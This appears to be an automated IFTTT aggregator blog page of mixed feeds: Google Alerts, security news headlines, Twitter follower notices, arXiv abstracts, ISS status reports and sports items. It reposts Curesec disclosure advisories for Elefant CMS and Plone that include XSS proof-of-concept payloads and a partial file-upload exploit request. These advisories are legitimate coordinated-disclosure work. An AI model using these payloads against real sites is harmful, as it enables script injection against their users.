Latest YouTube Video

Saturday, February 18, 2017

AuthCache + Drupal Commerce integration + anonymous caching question

Hey all, had question. I installed AuthCache module (as seems like most tutorials which i googled for 'caching drupal commerce' recommend ...

from Google Alert - anonymous http://ift.tt/2luK63g
via IFTTT

A Typo in Zerocoin's Source Code helped Hackers Steal ZCoins worth $585,000

Are you a programmer? If yes, then you would know the actual pain of... "forgetting a semicolon," the hide and seek champion since 1958. Typos annoy everyone. Remember how a hacker's typo stopped the biggest bank heist in the history, saved $1 billion of Bangladesh bank from getting stolen. But this time a typo in the Zerocoin source code costs the company more than $585,000 in losses. <!--


from The Hacker News http://ift.tt/2l6TIAv
via IFTTT

Anonymous Leaks Gain New Prominence In Trump-Era Journalism

Anonymous Leaks Gain New Prominence In Trump-Era Journalism. By David Folkenflik • 2 hours ago. TweetShareGoogle+Email ...

from Google Alert - anonymous http://ift.tt/2l6jzIR
via IFTTT

Google Discloses Windows Vulnerability That Microsoft Fails To Patch, Again!

Microsoft is once again facing embarrassment for not patching a vulnerability on time. Yes, Google's Project Zero team has once again publicly disclosed a vulnerability (with POC exploit) affecting Microsoft's Windows operating systems ranging from Windows Vista Service Pack 2 to the latest Windows 10 that had yet to be patched. A few months back, the search engine giant disclosed a critical


from The Hacker News http://ift.tt/2kzzII5
via IFTTT

I have a new follower on Twitter


The Inspired Home
Creating moments to connect.
Chicago, IL
https://t.co/V1KA5V3GrK
Following: 24339 - Followers: 30081

February 18, 2017 at 11:12AM via Twitter http://twitter.com/ihainspiredhome

I have a new follower on Twitter


GlassWire
GlassWire's free firewall helps protect your device, privacy, and data usage by visualizing your network activity. https://t.co/aGDu9rafC2
Austin, TX USA
https://t.co/aGDu9rafC2
Following: 1735 - Followers: 2007

February 18, 2017 at 08:37AM via Twitter http://twitter.com/GlassWireLabs

Anonymous/House of LIGHTS

Anonymous/House of LIGHTS · By 2thanks. Friday Feb 17, 2017 · 3:31 PM PST. 2017/02/17 · 15:31. 29 Comments (29 New). Share this article. 5. 5. 5 ...

from Google Alert - anonymous http://ift.tt/2kzitGL
via IFTTT

I have a new follower on Twitter


Invest in Yourself
We are team of professionals that promotes #startups and general #crowdfunding #projects, by providing #SEO optimized advertisment and #traffic to our clients.
New York City
http://t.co/as4BeseoqU
Following: 10131 - Followers: 30233

February 18, 2017 at 05:32AM via Twitter http://twitter.com/investors_by

Friday, February 17, 2017

I have a new follower on Twitter


Happy to help 💡♨💦☎
FREE impartial advice and FREE quotes on all your business utilities. Please email. laura.cousins@switchedonbrokers.com
Wilmslow

Following: 364 - Followers: 479

February 17, 2017 at 07:42PM via Twitter http://twitter.com/ljcousins

Study: Anonymous web browsing doesn't mean you stay anonymous

A study conducted by Stanford University and Princeton University researchers has found that anonymous browsing data can be frequently tied back ...

from Google Alert - anonymous http://ift.tt/2ky8qBG
via IFTTT

Illinois utility plan allows access to anonymous energy usage data

Illinois utility plan allows access to anonymous energy usage data. From the February 21, 2017 issue of Public Power Daily. Originally published ...

from Google Alert - anonymous http://ift.tt/2l3eyAV
via IFTTT

Hackers Are Using Android Malware To Spy On Israeli Military Personnel

A group of highly sophisticated state-sponsored hackers is spying on the Israeli military by hacking into the personal Android phones of individual soldiers to monitor their activities and steal data. A newly released research by Lookout and Kaspersky suggests that more than 100 Israeli servicemen from the Israeli Defense Force (IDF) are believed to have been targeted with spyware. <!--


from The Hacker News http://ift.tt/2lrvdih
via IFTTT

P Brad Brach hands Orioles first arbitration loss in 22 years; awarded $3.05M instead of $2.525M after 10-4 record, 2.05 ERA, 92 K in 2016 (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

ISS Daily Summary Report – 2/16/2017

Transition to (X2) R15 Software:  As part of the R15 software transition, the Starboard 1 (S1) and Port 1 (P1) Multiplexer/Demultiplexers (MDMs) were transitioned to updated software S1P1 R6. Updates to the S1 and P1 MDMs include:  Longeron Fault Detection Isolation & Recovery (FDIR) updates to protect for Beta Gimbal Assembly (BGA) stall conditions Thermal Radiator Rotary Joint (TRRJ) shutdown sequence improvements TRRJ Toothcrash Recovery update This completed the X2R15 software load. Robonaut Troubleshooting: Today the crew continued with the debugging of the Robonaut Compact Peripheral Component Interconnect (CPCI) Power Supply fault. These activities built upon the troubleshooting performed on February 1 and other previous operations to remove cables, computer cards and investigate the intermittent fault the Robonaut is currently experiencing. Removal of all cards and an inspection of the CPCI chassis, where the computer cards were previously located, may also be required. Robonaut is a humanoid robot designed with the versatility and dexterity to manipulate hardware, work in high risk environments, and respond safely to unexpected obstacles. Robonaut is comprised of a torso with two arms and a head, and two legs with end effectors that enable the robot to translate inside the ISS by interfacing with handrails and seat track. Robonaut is currently operated inside the ISS; in the future, it will perform tasks both inside and outside the ISS. The Robonaut Teleoperations System enables Robonaut to mimic the motions of a crewmember wearing specialized gloves, a vest and a visor providing a three-dimensional view through Robonaut’s eyes. Radio Frequency Identification (RFID) Logistics Installation: The crew continued to install the readers and antennas today, in the Node 2 module.  Due to cable routing issues, the crew was unable to fully mate the power cables to all of the deployed equipment.  Ground teams are looking into potential work-arounds and corrective actions.  Cabling issues identified yesterday were corrected and the deployed antennas and readers in the Lab and Node 1 are all nominal. The RFID Logistics experiment aims to utilize RFID enabled tags on hardware throughout the ISS, and assist in the tracking of the hardware as it is moved around the station.  Google Street View: After having a conference with ground support teams, the crew configured on-board digital cameras with a fisheye lens to capture 360 degree images of the Cupola, Node 3, and PMM modules.  Additional ISS modules will be mapped to provide an imaged topology to be used for educational community outreach. Mobile Servicing System (MSS) Operations:  Overnight, the Robotics Ground Controllers powered up the MSS and maneuvered the Space Station Remote Manipulator System (SSRMS) to stow the Special Purpose Dexterous Manipulator (SPDM) on Mobile Base System (MBS) Power Data Grapple Fixture 2 (PDGF2). Then the SSRMS was walked off MBS PDGF1 onto Node2 PDGF. Finally, SSRMS was maneuvered to the Offset Grapple Park position for the SpX-10 Crew Offset grapple practice. MSS performance today was nominal. SpaceX-10 (SpX-10) On-Board Training (OBT) Offset Grapple Practice: Robotics Ground Controllers powered up the Mobile Serving System (MSS) and performed a SpX-10 Offset Grapple practice session. Ground Controllers also performed the MSS Pre-Launch Checkouts. The USOS crew practiced maneuvering the Space Station Remote Manipulator System (SSRMS) into the grapple envelope of the Permanent Multipurpose Module (PMM) Flight Releasable Grapple Fixture (FRGF). After the Offset Grapples Practice session, the crew participated in a conference with ground specialists. Robotics ground controllers then maneuvered the SSRMS to the Rendezvous Park Position in preparation for SpX-10 capture on February 20th. Today’s Planned Activities All activities were completed unless otherwise noted. Nikon still camera sync with station time Audit of Crew Onboard Support Kit (КСПЭ) Equipment Robonaut Node 2 Camcorder Video Setup Robonaut Lab Camcorder Video Setup Robonaut CPCI Fault Backpanel UDOD. Experiment Ops with DYKNANIYE-1 and SPRUT-2 Sets ARED Crank Handle Cap Screw Torque Google Street View Procedure Review Google Street View Crew Conference Google Street View Node 3 Camcorder Video Setup HRF Generic Urine Collection Cleaning FGB ЦВ1 Circulation Fan Screens Google Street View Cupola Photo Operations HRF Generic Sample MELFI Insertion Operations HRF Generic Urine Collection Stow Vacuum cleaning of ВТ7 screens on ГЖТ4 behind FGB panel 108 Tissue Equivalent Proportional Counter (TEPC) Reorientation HRF Ultrasound Battery Removal Dose Tracker Data Entry Subject Formaldehyde Monitoring Kit (FMK) Stow Operation Dose Tracker Data Entry Subject Photo of the Crisstal experiment and Trash МО-21. Data Analysis (Sample1) Robonaut CPCI Fault Backpanel ESA Weekly crew conference Audit of Crew Onboard Support Kit (КСПЭ) Equipment МО-3. Physical Fitness Evaluation (on the treadmill) On-board Training (OBT) Dragon Offset Grapple Onboard Training (OBT) SSRMS Debrief Conference On-board Training (OBT) Dragon Attached Phase Operations Review CONTENT. Experiment Ops MSG MLC Software Load Fundoscope Prep Multi Omics Item Gathering Space Headaches – Weekly Questionnaire Fundoscope Eye Exam Fundoscope Tear Down and Stow Wastewater Storage Tank Assembly (WSTA) Fill  Completed Task List Items Radio Frequency Identification Logistics Install Manufacturing Device Print Removal, Clean and Stow SPHERES USB Stow Veggie 03 Pillow Watering Exploration New Earth – Life Support Exploration New Earth – Stowage JPM1OA5 Lamp Housing Assembly (LHA) Replacement LAB1OP5 SSLA Install  Ground Activities All activities were completed unless otherwise noted. X2R15 Software transition – PL and LA-1 MDMs Three-Day Look Ahead: Friday, 02/17: Dragon ROBoT Session, Cubesat Deployer Install Saturday, 02/18: Weekly Housekeeping, Crew Off Duty, SpaceX-10 Launch Sunday, 02/19: Crew Off Duty QUICK ISS Status – Environmental Control Group:     Component Status Elektron On Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) Off [СКВ] 2 – SM Air Conditioner System (“SKV2”) On Carbon Dioxide Removal Assembly (CDRA) Lab Standby Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Operate Major Constituent Analyzer (MCA) Node 3 Standby Oxygen Generation Assembly (OGA) Process Urine Processing Assembly (UPA) Process Trace Contaminant Control System (TCCS) Lab Off Trace Contaminant Control System (TCCS) Node 3 Full Up  

from ISS On-Orbit Status Report http://ift.tt/2l11hbZ
via IFTTT

59 minutes ago

When you're in charge of a community and there is a dispute between two members, you have to act as a neutral third party. Anonymous reports force ...

from Google Alert - anonymous http://ift.tt/2kFi54I
via IFTTT

This Ransomware Malware Could Poison Your Water Supply If Not Paid

Ransomware has been around for a few years, but in last two years, it has become an albatross around everyone's neck, targeting businesses, hospitals, financial institutions and personal computers worldwide and extorting millions of dollars. Ransomware is a type of malware that infects computers and encrypts their content with strong encryption algorithms, and then demands a ransom to decrypt


from The Hacker News http://ift.tt/2kZBzER
via IFTTT

Thursday, February 16, 2017

[2.1,2.2] Anonymous auto-enlistment fails to contact metadata service

Per the attached diagram. MaaS is receiving DHCP PXE calls via the router's DHCP helper address/forwarder, but fails to boot nodes for acceptance.

from Google Alert - anonymous http://ift.tt/2kvUPLm
via IFTTT

I have a new follower on Twitter


MarketScale
We help B2B brands market their products with the same level of precision and inspiration required to engineer them.
Dallas, TX
https://t.co/owXkuG3qAJ
Following: 1797 - Followers: 2238

February 16, 2017 at 09:43PM via Twitter http://twitter.com/MarketScale

Efficient Computation of Moments in Sum-Product Networks. (arXiv:1702.04767v1 [cs.LG])

Bayesian online learning algorithms for Sum-Product Networks (SPNs) need to compute moments of model parameters under the one-step update posterior distribution. The best existing method for computing such moments scales quadratically in the size of the SPN, although it scales linearly for trees. We propose a linear-time algorithm that works even when the SPN is a directed acyclic graph (DAG). We achieve this goal by reducing the moment computation problem into a joint inference problem in SPNs and by taking advantage of a special structure of the one-step update posterior distribution: it is a multilinear polynomial with exponentially many monomials, and we can evaluate moments by differentiating. The latter is known as the \emph{differential trick}. We apply the proposed algorithm to develop a linear time assumed density filter (ADF) for SPN parameter learning. As an additional contribution, we conduct extensive experiments comparing seven different online learning algorithms for SPNs on 20 benchmark datasets. The new linear-time ADF method consistently achieves low runtime due to the efficient linear-time algorithm for moment computation; however, we discover that two other methods (CCCP and SMA) typically perform better statistically, while a third (BMM) is comparable to ADF. Interestingly, CCCP can be viewed as implicitly using the same differentiation trick that we make explicit here. The fact that two of the top four fastest methods use this trick suggests that the same trick might find other uses for SPN learning in the future.



from cs.AI updates on arXiv.org http://ift.tt/2kY74io
via IFTTT

Theoretical and Practical Advances on Smoothing for Extensive-Form Games. (arXiv:1702.04849v1 [cs.GT])

Sparse iterative methods, in particular first-order methods, are known to be among the most effective in solving large-scale two-player zero-sum extensive-form games. The convergence rates of these methods depend heavily on the properties of the distance-generating function that they are based on. We investigate the acceleration of first-order methods for solving extensive-form games through better design of the dilated entropy function---a class of distance-generating functions related to the domains associated with the extensive-form games. By introducing a new weighting scheme for the dilated entropy function, we develop the first distance-generating function for the strategy spaces of sequential games that has no dependence on the branching factor of the player. This result improves the convergence rate of several first-order methods by a factor of $\Omega(b^dd)$, where $b$ is the branching factor of the player, and $d$ is the depth of the game tree.

Thus far, counterfactual regret minimization methods have been faster in practice, and more popular, than first-order methods despite their theoretically inferior convergence rates. Using our new weighting scheme and practical tuning we show that, for the first time, the excessive gap technique can be made faster than the fastest counterfactual regret minimization algorithm, CFR+, in practice.



from cs.AI updates on arXiv.org http://ift.tt/2kPq7Jl
via IFTTT

Reflexive Regular Equivalence for Bipartite Data. (arXiv:1702.04956v1 [cs.LG])

Bipartite data is common in data engineering and brings unique challenges, particularly when it comes to clustering tasks that impose on strong structural assumptions. This work presents an unsupervised method for assessing similarity in bipartite data. Similar to some co-clustering methods, the method is based on regular equivalence in graphs. The algorithm uses spectral properties of a bipartite adjacency matrix to estimate similarity in both dimensions. The method is reflexive in that similarity in one dimension is used to inform similarity in the other. Reflexive regular equivalence can also use the structure of transitivities -- in a network sense -- the contribution of which is controlled by the algorithm's only free-parameter, $\alpha$. The method is completely unsupervised and can be used to validate assumptions of co-similarity, which are required but often untested, in co-clustering analyses. Three variants of the method with different normalizations are tested on synthetic data. The method is found to be robust to noise and well-suited to asymmetric co-similar structure, making it particularly informative for cluster analysis and recommendation in bipartite data of unknown structure. In experiments, the convergence and speed of the algorithm are found to be stable for different levels of noise. Real-world data from a network of malaria genes are analyzed, where the similarity produced by the reflexive method is shown to out-perform other measures' ability to correctly classify genes.



from cs.AI updates on arXiv.org http://ift.tt/2kY8rOf
via IFTTT

Two Timescale Stochastic Approximation with Controlled Markov noise and Off-policy temporal difference learning. (arXiv:1503.09105v12 [math.DS] UPDATED)

We present for the first time an asymptotic convergence analysis of two time-scale stochastic approximation driven by `controlled' Markov noise. In particular, both the faster and slower recursions have non-additive controlled Markov noise components in addition to martingale difference noise. We analyze the asymptotic behavior of our framework by relating it to limiting differential inclusions in both time-scales that are defined in terms of the ergodic occupation measures associated with the controlled Markov processes. Finally, we present a solution to the off-policy convergence problem for temporal difference learning with linear function approximation, using our results.



from cs.AI updates on arXiv.org http://ift.tt/1EA6KLi
via IFTTT

Learning to Poke by Poking: Experiential Learning of Intuitive Physics. (arXiv:1606.07419v2 [cs.CV] UPDATED)

We investigate an experiential learning paradigm for acquiring an internal model of intuitive physics. Our model is evaluated on a real-world robotic manipulation task that requires displacing objects to target locations by poking. The robot gathered over 400 hours of experience by executing more than 100K pokes on different objects. We propose a novel approach based on deep neural networks for modeling the dynamics of robot's interactions directly from images, by jointly estimating forward and inverse models of dynamics. The inverse model objective provides supervision to construct informative visual features, which the forward model can then predict and in turn regularize the feature space for the inverse model. The interplay between these two objectives creates useful, accurate models that can then be used for multi-step decision making. This formulation has the additional benefit that it is possible to learn forward models in an abstract feature space and thus alleviate the need of predicting pixels. Our experiments show that this joint modeling approach outperforms alternative methods.



from cs.AI updates on arXiv.org http://ift.tt/291kNxf
via IFTTT

Grammatical Templates: Improving Text Difficulty Evaluation for Language Learners. (arXiv:1609.05180v2 [cs.CL] UPDATED)

Language students are most engaged while reading texts at an appropriate difficulty level. However, existing methods of evaluating text difficulty focus mainly on vocabulary and do not prioritize grammatical features, hence they do not work well for language learners with limited knowledge of grammar. In this paper, we introduce grammatical templates, the expert-identified units of grammar that students learn from class, as an important feature of text difficulty evaluation. Experimental classification results show that grammatical template features significantly improve text difficulty prediction accuracy over baseline readability features by 7.4%. Moreover, we build a simple and human-understandable text difficulty evaluation approach with 87.7% accuracy, using only 5 grammatical template features.



from cs.AI updates on arXiv.org http://ift.tt/2d0yz52
via IFTTT

Coupling Distributed and Symbolic Execution for Natural Language Queries. (arXiv:1612.02741v2 [cs.LG] UPDATED)

Building neural networks to query a knowledge base (a table) with natural language is an emerging research topic in NLP. The neural enquirer typically necessitates multiple steps of execution because of the compositionality of queries. In previous studies, researchers have developed either distributed enquirers or symbolic ones for table querying. The distributed enquirer is end-to-end learnable, but is weak in terms of execution efficiency and explicit interpretability. The symbolic enqurier, on the contrary, is efficient during execution; but it is very difficult to train especially at initial stages. In this paper, we propose to couple distributed and symbolic execution for natural language queries. The observation is that a fully distributed executor also exhibits meaningful, albeit imperfect, interpretation. We can thus pretrain the symbolic executor with the distributed one's intermediate execution results in a step-by-step fashion. Experiments show that our approach significantly outperforms either the distributed or symbolic executor; moreover, we have recovered more than 80% execution sequences with only groundtruth denotations during training. In summary, the coupled neural enquirer takes advantages of both distributed and symbolic executors, and has high performance, high learning efficiency, high execution efficiency, and high interpretability.



from cs.AI updates on arXiv.org http://ift.tt/2ggxMx4
via IFTTT

Orioles: RP Brad Brach asks for $3.05M in arbitration; team offers $2.5M (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Anonymous Posting as "A TripAdvisor member"?

Answer 1 of 6: Hi - I'd really like to understand how and why people are posting anonymously as "A TripAdvisor member" and would be grateful for ...

from Google Alert - anonymous http://ift.tt/2lnuNd1
via IFTTT

Lottery winners could soon be anonymous

Lottery winners could soon be anonymous. Posted on February 16, 2017. Lottery winners in Idaho may get to hide their identities under new ...

from Google Alert - anonymous http://ift.tt/2lXXwlf
via IFTTT

Anonymous Donor Leaves Free Treats At Bottom Of Vending Machine As

An anonymous donor perked up everyone working at The Christie in Manchester's day with a Random Act of Kindness.

from Google Alert - anonymous http://ift.tt/2lmIEQB
via IFTTT

This anonymous Tiger

This anonymous Tiger is currently homeless, awaiting his fate on the west verandah of the St Vincent De Paul used goods store. Despite the ...

from Google Alert - anonymous http://ift.tt/2lmGdha
via IFTTT

Anonymous U football player: Fleck more proactive than Kill/Claeys in accountability

The player spoke with the Daily Friday and asked to remain anonymous to preserve his standing with teammates as he discussed the boycott, how the ...

from Google Alert - anonymous http://ift.tt/2kNYnVq
via IFTTT

Chameleon in a Candy Store

Anonymous is back with the intoxicating, darkly dangerous, and wildly addictive sequel to his New York Times bestselling debut novel Diary of an ...

from Google Alert - anonymous http://ift.tt/2locbsQ
via IFTTT

A Simple JavaScript Exploit Bypasses ASLR Protection On 22 CPU Architectures

Security researchers have discovered a chip flaw that could nullify hacking protections for millions of devices regardless of their operating system or application running on them, and the worse — the flaw can not be entirely fixed with any mere software update. The vulnerability resides in the way the memory management unit (MMU), a component of many CPUs, works and leads to bypass the


from The Hacker News http://ift.tt/2lX7NOs
via IFTTT

[FD] "long" filenames mishandled by Fujitsu's ScanSnap software

[FD] Elefant CMS 1.3.12-RC: Code Execution

Security Advisory - Curesec Research Team 1. Introduction Affected Product: Elefant CMS 1.3.12-RC Fixed in: 1.3.13 Fixed Version http://ift.tt/2kNFkut Link: elefant_1_3_13_rc Vendor Website: http://ift.tt/1G6Va79 Vulnerability Code Execution Type: Remote Yes Exploitable: Reported to 09/05/2016 vendor: Disclosed to 02/02/2017 public: Release mode: Coordinated Release CVE: n/a (not requested) Credits Tim Coen of Curesec GmbH 2. Overview Elefant is a content managment system written in PHP. In version 1.3.12-RC, it is vulnerable to code execution because of two different vulnerabilities. It allows the upload of files with dangerous type, as well as PHP code injection. An account is required to exploit these issues. 3. Details Upload of file with dangerous type CVSS: High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C The file upload forbids the uploading of files with the .php extension, but allows uploading of files with a number of other dangerous extensions leading to code execution and XSS. A user account is required which has the right to upload and manage files. By default, the editor or admin role have this right. Proof of Concept: POST /filemanager/upload/drop HTTP/1.1 Host: localhost Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/ form-data; boundary

Source: Gmail -> IFTTT-> Blogger

[FD] Elefant CMS 1.3.12-RC: Code Execution

Security Advisory - Curesec Research Team 1. Introduction Affected Product: Elefant CMS 1.3.12-RC Fixed in: 1.3.13 Fixed Version http://ift.tt/2kNFkut Link: elefant_1_3_13_rc Vendor Website: http://ift.tt/1G6Va79 Vulnerability Code Execution Type: Remote Yes Exploitable: Reported to 09/05/2016 vendor: Disclosed to 02/02/2017 public: Release mode: Coordinated Release CVE: n/a (not requested) Credits Tim Coen of Curesec GmbH 2. Overview Elefant is a content managment system written in PHP. In version 1.3.12-RC, it is vulnerable to code execution because of two different vulnerabilities. It allows the upload of files with dangerous type, as well as PHP code injection. An account is required to exploit these issues. 3. Details Upload of file with dangerous type CVSS: High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C The file upload forbids the uploading of files with the .php extension, but allows uploading of files with a number of other dangerous extensions leading to code execution and XSS. A user account is required which has the right to upload and manage files. By default, the editor or admin role have this right. Proof of Concept: POST /filemanager/upload/drop HTTP/1.1 Host: localhost Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/ form-data; boundary

Source: Gmail -> IFTTT-> Blogger

[FD] Plone: XSS

Security Advisory - Curesec Research Team 1. Introduction Affected Product: Plone 5.0.5 Fixed in: Hotfix 20170117 Fixed Version Link: http://ift.tt/2lIOWaM Vendor Contact: security@plone.org Vulnerability Type: XSS Remote Exploitable: Yes Reported to vendor: 09/05/2016 Disclosed to public: 01/26/2017 Release mode: Coordinated Release CVE: CVE-2016-7147 Credits Tim Coen of Curesec GmbH 2. Overview Plone is an open source CMS written in python. In version 5.0.5, the Zope Management Interface (ZMI) component is vulnerable to reflected XSS as it does not properly encode double quotes. 3. Details CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Description: The search functionality of the management interface is vulnerable to reflected XSS. As the input is echoed into an HMTL attribute, an attacker can use double quotes to escape the current attribute and add new attributes to enter a JavaScript context. Proof of Concept: http://ift.tt/2lWGdkq obj_ids%3Atokens=%22+autofocus+onfocus%3dalert(1)%3E&obj_searchterm=&obj_mspec= %3C&obj_mtime=&search_sub%3Aint=1&btn_submit=Find 4. Solution To mitigate this issue please apply the hotfix 20170117. Please note that a newer version might already be available. 5. Report Timeline 09/05/2016 Contacted Vendor, Vendor confirmed, Requested CVE 09/06/2016 CVE assigned 09/06/2016 Vendor requests 90 days to release fix 01/10/2017 Contacted Vendor Again, Vendor announces hotfix 01/17/2017 Vendor releases hotfix 01/26/2017 Disclosed to public Blog Reference: http://ift.tt/2lIOc5h

Source: Gmail -> IFTTT-> Blogger

[FD] Elefant CMS 1.3.12-RC: CSRF

Security Advisory - Curesec Research Team 1. Introduction Affected Product: Elefant CMS 1.3.12-RC Fixed in: 1.3.13 Fixed Version http://ift.tt/2kNFkut Link: elefant_1_3_13_rc Vendor Website: http://ift.tt/1G6Va79 Vulnerability CSRF Type: Remote Yes Exploitable: Reported to 09/05/2016 vendor: Disclosed to 02/02/2017 public: Release mode: Coordinated Release CVE: n/a (not requested) Credits Tim Coen of Curesec GmbH 2. Overview Elefant is a content managment system written in PHP. In version 1.3.12-RC, it is vulnerable to cross site request forgery. If a victim visits a website that contains specifically crafted code while logged into Elefant, an attacker can for example create a new admin account without the victims knowledge. 3. Details CVSS: Medium 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P There is no CSRF protection for various components, allowing among other the creation of new admin accounts or XSS attacks. Proof of Concept: Create New Admin:
XSS:
4. Solution To mitigate this issue please upgrade at least to version 1.3.13. Please note that a newer version might already be available. 5. Report Timeline 09/05/2016 Informed Vendor about Issue, Vendor announces fix 11/07/2016 Asked Vendor if recent releases fixes issues, Vendor confirmed 02/02/2017 Disclosed to public Blog Reference: http://ift.tt/2kufPlB

Source: Gmail -> IFTTT-> Blogger

[FD] Elefant CMS 1.3.12-RC: Multiple Persistent and Reflected XSS

Security Advisory - Curesec Research Team 1. Introduction Affected Product: Elefant CMS 1.3.12-RC Fixed in: 1.3.13 Fixed Version http://ift.tt/2kNFkut Link: elefant_1_3_13_rc Vendor Website: http://ift.tt/1G6Va79 Vulnerability XSS Type: Remote Yes Exploitable: Reported to 09/05/2016 vendor: Disclosed to 02/02/2017 public: Release mode: Coordinated Release CVE: n/a (not requested) Credits Tim Coen of Curesec GmbH 2. Overview Elefant is a content managment system written in PHP. In version 1.3.12-RC, it is vulnerable to multiple persistent as well as a reflected XSS issue. This allows an attacker to steal cookies, inject JavaScript keyloggers, or bypass CSRF protection. 3. Details Persistent XSS: Username CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N The username is echoed in various locations in the administration backend without encoding, leading to persistent XSS vulnerabilities. A user account is required, but the registration is open by default. Proof of Concept: 1. Register a new user (the registration is open by default). 2. Update the profile, as name use: Username To trigger the payload: 1. Log in as admin 2. View the edit page for the user, for example: http://localhost/user/edit?id=3 Alternatively, the payload is also echoed on the page listing all users: http://localhost/admin/versions?id=&type=User As well as on the version page: http://localhost/admin/versions?type=User&id=3 Persistent XSS: Version Comparison CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N Various fields of various components are echoed unencoded when comparing versions of those components. Examples are the user profile fields Name, Address, Address 2, City, Title, Company, or About, or the Title, Menu Title, Window Title, Description, or Keyword of a page. Proof of Concept: The comparison page can for example be seen here: http://localhost/admin/ compare?id=8&current=no Persistent XSS: Page & Content Block CVSS: Medium 4.0 AV:N/AC:L/Au:S/C:N/I:P/A:N The title of a new webpage is echoed unencoded, leading to persistent XSS. The same issue also exists when creating blocks. A user account with the right to create pages is required. By default, the editor role has this right. Proof of Concept: Create a new page or block, as title use: The payload will be echoed in a title tag as well as a h1 tag when viewing the page and when editing the page. Persistent XSS: Blog Post CVSS: Medium 4.0 AV:N/AC:L/Au:S/C:N/I:P/A:N The title as well as the tags of a blog post are echoed unencoded, leading to persistent XSS. A user account with the right to create pages is required. By default, the editor role has this right Proof of Concept: Create a new blog post, as title and tag use: '"> The payload will be echoed in a title tag, a h1 tag, as well as a href tag when viewing the page and when editing the page. Reflected XSS CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N The name parameter of the custom fields component is vulnerable to reflected XSS. Proof of Concept: GET /admin/extended?extends=User&name=%3Cimg%20src=no%20onerror=alert(1)%3E HTTP/1.1 4. Solution To mitigate this issue please upgrade at least to version 1.3.13. Please note that a newer version might already be available. 5. Report Timeline 09/05/2016 Informed Vendor about Issue, Vendor announces fix 11/07/2016 Asked Vendor if recent releases fixes issues, Vendor confirmed 02/02/2017 Disclosed to public Blog Reference: http://ift.tt/2kBVjea

Source: Gmail -> IFTTT-> Blogger

Five Moves: Pick up C.J. Mosley's option, re-sign Brandon Williams among Bill Barnwell's offseason priorities for Ravens (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Regarding Prospects Visit Anonymous Visitor Page U...

Under "Prospects Visit" page, if click on list of company names a popup in the right side has Anonymous Visitor. This shows a page title.

from Google Alert - anonymous http://ift.tt/2lOZsjY
via IFTTT

ISS Daily Summary Report – 2/15/2017

Transition to (X2) R15 Software:  As part of the R15 software transition, the Payload (PL) Multiplexer/Demultiplexers (MDMs) were transitioned to updated software Payload Executive Processor R12 (PEP R12) today. Updates to the PL MDMs include:  Redundancy Management Time Reduction Additionally, the Lab-1 (LA-1) MDM was transitioned to Lab System-R5 (LSYS1-R5) software. Updates to the LA-1 MDM includes: Checksum region expanded to include restart vector Common Cabin Air Assembly (CCAA) setpoint telemetry updates Tomorrow, the Port 1 (P1) and Starboard 1 (S1) MDMs will be updated to new software. Capillary Flow Experiment-2 Interior Corner Flow-9 (CFE ICF-9): The crew used a CFE-2 vessel to perform several Interior Corner Flow tests that show the passive capillary driven redistribution of liquid in a container in low-gravity due to the specific fluid properties and 3-D geometry of the container and the spontaneous phase separation characteristics of such flows when bubbles are introduced into the liquid. CFE-ICF studies capillary flow in interior corners. Structured inside tanks providing interior corners are used in the design of fuel tanks so that the fuel will always flow to the outlet of the tank in the absence of gravity. The equations governing the process are known but, to date, have not been solved analytically because of a lack of experimental data identifying the appropriate boundary conditions for the flow problem. Experimental results will guide the analysis by providing the necessary boundary conditions as a function of container cross section and fill fraction. The benchmarked theory can then be used to improve propellant management aboard spacecraft. JEM Airlock (JEMAL) Operations: The crew removed the Robotics External Leak Locator (RELL) and JEM ORU Transfer Interface (JOTI) from the JEMAL Slide Table this morning following this past weekend’s successful operations.  The crew then installed the Small Fine Arm Attachment Mechanism (SAM) and Multi-Purpose Experiment Platform (MPEP) on the Slide Table.  Later this week, the crew will install NanoRack Cubesat Deployer (NRCSD) #10 which will be deployed after SpaceX-10 and 66 Progress have docked to the ISS. Human Research Facility (HRF) Collections: Upon wakeup the crew performed their Flight Day 120 (FD120) Biochemical Profile and Repository blood and urine collections.  The samples collected were placed in Minus Eighty Degree Celsius Laboratory Freezer for ISS (MELFI). The Biochemical Profile experiment tests blood and urine samples obtained from astronauts before, during, and after spaceflight. Specific proteins and chemicals in the samples are used as biomarkers, or indicators of health. Post-flight analysis yields a database of samples and test results, which scientists can use to study the effects of spaceflight on the body. Repository is a storage bank used to maintain biological specimens over extended periods of time and under well-controlled conditions. This repository supports scientific discovery that contributes to our fundamental knowledge in the area of human physiological changes and adaptation to a microgravity environment and provides unique opportunities to study longitudinal changes in human physiology spanning many missions. Radio Frequency Identification (RFID) Logistics: Yesterday, the crew installed antennas in the Lab and Node 1 modules.  After activation, ground teams identified Node 1 Reader 1 was not providing data.  Based on downlink photos teams determined that a power cable was not connected.  Today, the crew completed the RFID Logistics hardware in Node 2 and successfully connected the power cable to the Node 1 Reader 1 recovering the Node 1 capabilities. The RFID Logistics experiment aims to utilize RFID enabled tags on hardware throughout the ISS, and assist in the tracking of the hardware as it is moved around the station.   Solar Platform Powerdown: With the completion of the Solar experiment the Solar platform was unpowered for the final time.  The Solar platform is planned to return on SpaceX-12. Solar is a monitoring observatory that will measure the solar spectral irradiance. Apart from scientific contributions for solar and stellar physics, the knowledge of the solar energy irradiance into the Earth’s atmosphere and its variations is of great importance for atmospheric modeling, atmospheric chemistry and climatology. The three experiments mounted on Solar are Solar Variable and Irradiance Monitor (SOVIM) observing the near-ultraviolet, visible and thermal regions of the spectrum (200 nanometers – 100 micrometers); SOLar SPECtral Irradiance Measurements (SOLSPEC) observing the 180 – 3000 nanometer range with high spectral resolution; and SOLar Auto-Calibrating Extreme UV/UV Spectrometers 